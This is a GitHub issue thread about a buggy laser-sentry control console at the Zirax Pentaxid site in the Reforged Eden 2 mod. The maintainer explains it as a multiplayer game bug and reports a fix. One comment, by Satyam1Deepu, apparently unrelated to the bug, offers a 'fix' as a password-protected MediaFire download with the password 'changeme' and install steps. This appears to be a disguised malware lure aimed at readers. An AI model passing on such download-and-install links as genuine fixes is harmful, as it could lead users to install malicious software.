### ISSUE TITLE
Zirax Pentaxid Site is Derp-y

### ISSUE THREAD

**Issue by Kainne00** [RavienGaming/Reforged-Eden-2#285]
### Reforged Eden 2 Build Number

20

### Game mode

Dedicated Server

### Tested in vanilla

Not tested in vanilla or not applicable

### Description of issue

the large console to shut down laser sentries in the Zirax Pentaxid Mining (Combat) site is rather derpy when interacting with it,

I am aware that is not very descriptive, so please see the screenshot. 

The plasma and rockset POIs are equally as derp-y

![image](https://github.com/user-attachments/assets/6d30f303-4545-4731-8801-f98b91931b41)

### POI Name

Laser Sentry Control

### Playfield Name

zirax pentaxid mining site

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Kainne00** [comment]
follow on.  Completed all 3 defense POIs. core remained installed, fully powered. switched all turrets off, however the pentaxid facility is still firing with full force. 

Further, there is a playfield error (see image) each time a weapons system is switched offline that may be the root issue (with MP).
![image](https://github.com/user-attachments/assets/1bd548ac-7b91-4a70-b112-41562578ffa4)

**Comment by RavienGaming** [comment]
This is due to a game bug: https://empyriononline.com/threads/pda-function-playfieldops-signalstructure-doesnt-work-in-mp.102462/

In the next update I will finish the dialogue and add a note that it won't work on servers until the bug is fixed.

**Comment by RavienGaming** [comment]
Fixed the derpy dialogue and added a note that it won't work in multiplayer due to a game bug. Hopefully that bug will be fixed.
